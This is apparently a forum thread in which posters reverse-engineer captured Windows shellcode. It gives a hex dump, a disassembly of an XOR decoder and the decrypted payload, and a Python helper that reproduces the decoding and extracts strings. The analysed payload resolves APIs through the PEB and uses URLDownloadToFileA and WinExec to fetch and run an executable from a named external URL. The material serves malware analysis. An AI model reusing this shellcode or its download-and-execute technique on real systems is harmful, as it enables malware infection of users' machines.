Post #2
My guess is that it downloads http://www.tian6.com/racle/123456789.exe, but I don't know where the code begins, so nothing can be made out from it; it may not be the complete shellcode.
Post #3
The first 12 bytes are probably there to work with the overflow.
00000000 20 60 41 00 B8 0E FA 7F B7 0E FA 7F  `A.........
The analysis starts from the 13th byte.
0000000C 83EC 70 sub esp, 70
0000000F EB 10 jmp short 00000021
00000011 5A pop edx
00000012 4A dec edx
00000013 33C9 xor ecx, ecx
00000015 66:B9 3C01 mov cx, 13C
00000019 80340A 99 xor byte ptr [edx+ecx], 99
0000001D ^ E2 FA loopd short 00000019
0000001F EB 05 jmp short 00000026
00000021 E8 EBFFFFFF call 00000011
00000026 70 4C jo short 00000074
......
The code above is a decryption loop: it XORs the 0x13C bytes starting at 0x26 with 0x99. Here is the decrypted content.
00000026 E9 D5000000 jmp 00000100
0000002B 5A pop edx
0000002C 64:A1 30000000 mov eax, dword ptr fs:[30]
00000032 8B40 0C mov eax, dword ptr [eax+C]
00000035 8B70 1C mov esi, dword ptr [eax+1C]
00000038 AD lods dword ptr [esi]
00000039 8B40 08 mov eax, dword ptr [eax+8]
0000003C 8BD8 mov ebx, eax
0000003E 8B73 3C mov esi, dword ptr [ebx+3C]
00000041 8B741E 78 mov esi, dword ptr [esi+ebx+78]
00000045 03F3 add esi, ebx
00000047 8B7E 20 mov edi, dword ptr [esi+20]
0000004A 03FB add edi, ebx
0000004C 8B4E 14 mov ecx, dword ptr [esi+14]
0000004F 33ED xor ebp, ebp
00000051 56 push esi
00000052 57 push edi
00000053 51 push ecx
00000054 8B3F mov edi, dword ptr [edi]
00000056 03FB add edi, ebx
00000058 8BF2 mov esi, edx
0000005A 6A 0E push 0E
0000005C 59 pop ecx
0000005D F3:A6 repe cmps byte ptr es:[edi], byte ptr [esi]
0000005F 74 08 je short 00000069
00000061 59 pop ecx
00000062 5F pop edi
00000063 83C7 04 add edi, 4
00000066 45 inc ebp
00000067 ^ E2 E9 loopd short 00000052
00000069 59 pop ecx
0000006A 5F pop edi
0000006B 5E pop esi
0000006C 8BCD mov ecx, ebp
0000006E 8B46 24 mov eax, dword ptr [esi+24]
00000071 03C3 add eax, ebx
00000073 D1E1 shl ecx, 1
00000075 03C1 add eax, ecx
00000077 33C9 xor ecx, ecx
00000079 66:8B08 mov cx, word ptr [eax]
0000007C 8B46 1C mov eax, dword ptr [esi+1C]
0000007F 03C3 add eax, ebx
00000081 C1E1 02 shl ecx, 2
00000084 03C1 add eax, ecx
00000086 8B00 mov eax, dword ptr [eax]
00000088 03C3 add eax, ebx
0000008A 8BFA mov edi, edx
0000008C 8BF7 mov esi, edi
0000008E 83C6 0E add esi, 0E
00000091 8BD0 mov edx, eax
00000093 6A 04 push 4
00000095 59 pop ecx
00000096 E8 50000000 call 000000EB
0000009B 83C6 0D add esi, 0D
0000009E 52 push edx
0000009F 56 push esi
000000A0 FF57 FC call dword ptr [edi-4]
000000A3 5A pop edx
000000A4 8BD8 mov ebx, eax
000000A6 6A 01 push 1
000000A8 59 pop ecx
000000A9 E8 3D000000 call 000000EB
000000AE 83C6 13 add esi, 13
000000B1 56 push esi
000000B2 46 inc esi
000000B3 803E 80 cmp byte ptr [esi], 80
000000B6 ^ 75 FA jnz short 000000B2
000000B8 8036 80 xor byte ptr [esi], 80
000000BB 5E pop esi
000000BC 83EC 20 sub esp, 20
000000BF 8BDC mov ebx, esp
000000C1 6A 20 push 20
000000C3 53 push ebx
000000C4 FF57 EC call dword ptr [edi-14]
000000C7 C70403 5C612E65 mov dword ptr [ebx+eax], 652E615C
000000CE C74403 04 78650>mov dword ptr [ebx+eax+4], 6578
000000D6 33C0 xor eax, eax
000000D8 50 push eax
000000D9 50 push eax
000000DA 53 push ebx
000000DB 56 push esi
000000DC 50 push eax
000000DD FF57 FC call dword ptr [edi-4]
000000E0 8BDC mov ebx, esp
000000E2 50 push eax
000000E3 53 push ebx
000000E4 FF57 F0 call dword ptr [edi-10]
000000E7 50 push eax
000000E8 FF57 F4 call dword ptr [edi-C]
000000EB 33C0 xor eax, eax
000000ED AC lods byte ptr [esi]
000000EE 85C0 test eax, eax
000000F0 ^ 75 F9 jnz short 000000EB
000000F2 51 push ecx
000000F3 52 push edx
000000F4 56 push esi
000000F5 53 push ebx
000000F6 FFD2 call edx
000000F8 5A pop edx
000000F9 59 pop ecx
000000FA AB stos dword ptr es:[edi]
000000FB ^ E2 EE loopd short 000000EB
000000FD 33C0 xor eax, eax
000000FF C3 retn
00000100 E8 26FFFFFF call 0000002B
00000105 47 inc edi
From 0x105 onward it is data.
00000105 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 47 GetProcAddress.G
00000115 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 etSystemDirector
00000125 79 41 00 57 69 6E 45 78 65 63 00 45 78 69 74 54 yA.WinExec.ExitT
00000135 68 72 65 61 64 00 4C 6F 61 64 4C 69 62 72 61 72 hread.LoadLibrar
00000145 79 41 00 75 72 6C 6D 6F 6E 00 55 52 4C 44 6F 77 yA.urlmon.URLDow
00000155 6E 6C 6F 61 64 54 6F 46 69 6C 65 41 00 68 74 74 nloadToFileA.htt
00000165 70 3A 2F 2F 77 77 77 2E 74 69 61 6E 36 2E 63 6F p://www.tian6.co
00000175 6D 2F 72 61 63 6C 65 2F 31 32 33 34 35 36 37 38 m/racle/12345678
00000185 39 2E 65 78 65 80 00 00 9.exe€..
I didn't analyze the rest carefully, but the data already gives away how it works: it walks the PEB to find kernel32's GetProcAddress, then looks up the other functions to download the exe and run it. Very standard shellcode.
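An added analysis helper, written for this thread and not code from the post or from the shellcode's author: it reproduces the decoder loop in Python (XOR the 0x13C bytes from 0x26 with 0x99) and then parses the string table, splitting the NUL-separated API names and treating the 0x80 byte the way the loop at 0xB2 does, as the URL's terminator. The sample buffer is constructed from the strings in the dump, with 0x90 filler in place of the stub bytes, and is not the captured shellcode. One thing the listed offsets make visible: the loop covers 0x26 through 0x161, while the string table starts at 0x105 and the URL begins 93 bytes later at 0x162, so the URL was never XOR-encoded, which is why post #2 could read it straight out of the raw bytes.

```python
import re

# Constants taken from the decoder stub in the post's disassembly.
DECODE_START = 0x26    # call 0x11 pushes 0x26; pop edx / dec edx -> edx = 0x25
DECODE_LEN = 0x13C     # mov cx, 13C; loop touches [edx+ecx] for ecx = 0x13C..1
XOR_KEY = 0x99         # xor byte ptr [edx+ecx], 99
TABLE_OFFSET = 0x105   # first byte of the string table after the final call
URL_TERMINATOR = 0x80  # loop at 0xB2 scans for 0x80, then xors it with 0x80 -> NUL

# Constructed sample strings, laid out as in the post's dump (not the captured bytes).
SAMPLE_APIS = [b"GetProcAddress", b"GetSystemDirectoryA", b"WinExec", b"ExitThread",
               b"LoadLibraryA", b"urlmon", b"URLDownloadToFileA"]
SAMPLE_URL = b"http://www.tian6.com/racle/123456789.exe"


def xor_region(blob: bytes, start: int = DECODE_START, length: int = DECODE_LEN,
               key: int = XOR_KEY) -> bytes:
    """XOR blob[start:start+length] with key (symmetric, so it encodes and decodes)."""
    out = bytearray(blob)
    for i in range(start, min(start + length, len(out))):
        out[i] ^= key
    return bytes(out)


def decoded_range() -> tuple:
    """Inclusive offsets the stub's loop rewrites: edx+1 .. edx+0x13C with edx = 0x25."""
    return (DECODE_START, DECODE_START + DECODE_LEN - 1)


def extract_strings(table: bytes) -> list:
    """Split the NUL-separated table; a 0x80 byte counts as the NUL the stub turns it into."""
    strings, cur = [], bytearray()
    for b in table:
        if b == URL_TERMINATOR:
            b = 0
        if b != 0:
            cur.append(b)
            continue
        if not cur:
            break  # consecutive NULs: end of table
        strings.append(cur.decode("latin-1"))
        cur = bytearray()
    return strings


def find_plaintext_urls(blob: bytes) -> list:
    """URLs readable in the raw buffer without decoding (what post #2 spotted)."""
    return [m.decode("ascii") for m in re.findall(rb"https?://[\x21-\x7e]+", blob)]


def build_sample() -> bytes:
    """Construct an encoded buffer shaped like the post's dump (stub bytes are filler)."""
    table = b"\0".join(SAMPLE_APIS + [SAMPLE_URL]) + bytes([URL_TERMINATOR, 0, 0])
    plain = b"\x90" * TABLE_OFFSET + table   # 0x90 filler stands in for the stub code
    return xor_region(plain)                 # encode exactly as the stub would decode


def analyze(blob: bytes) -> dict:
    """Decode the buffer and report the imported API names and the download URL."""
    decoded = xor_region(blob)
    strings = extract_strings(decoded[TABLE_OFFSET:])
    urls = [s for s in strings if s.startswith(("http://", "https://"))]
    url_offset = decoded.find(urls[0].encode("ascii")) if urls else -1
    lo, hi = decoded_range()
    return {
        "apis": [s for s in strings if s not in urls],
        "urls": urls,
        "url_offset": url_offset,
        "url_inside_decoded_range": lo <= url_offset <= hi,
    }


if __name__ == "__main__":
    sample = build_sample()
    print("visible before decoding:", find_plaintext_urls(sample))
    print(analyze(sample))
```

Running it on the constructed sample shows the URL is recoverable from the raw bytes, while the API names only appear after the XOR pass; for a real capture, replace `build_sample()` with the dumped bytes and keep the four constants from the disassembly.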
Post #4
Thanks to the two posters above for the explanation.
Special thanks to icersg; I've copied it down to digest slowly.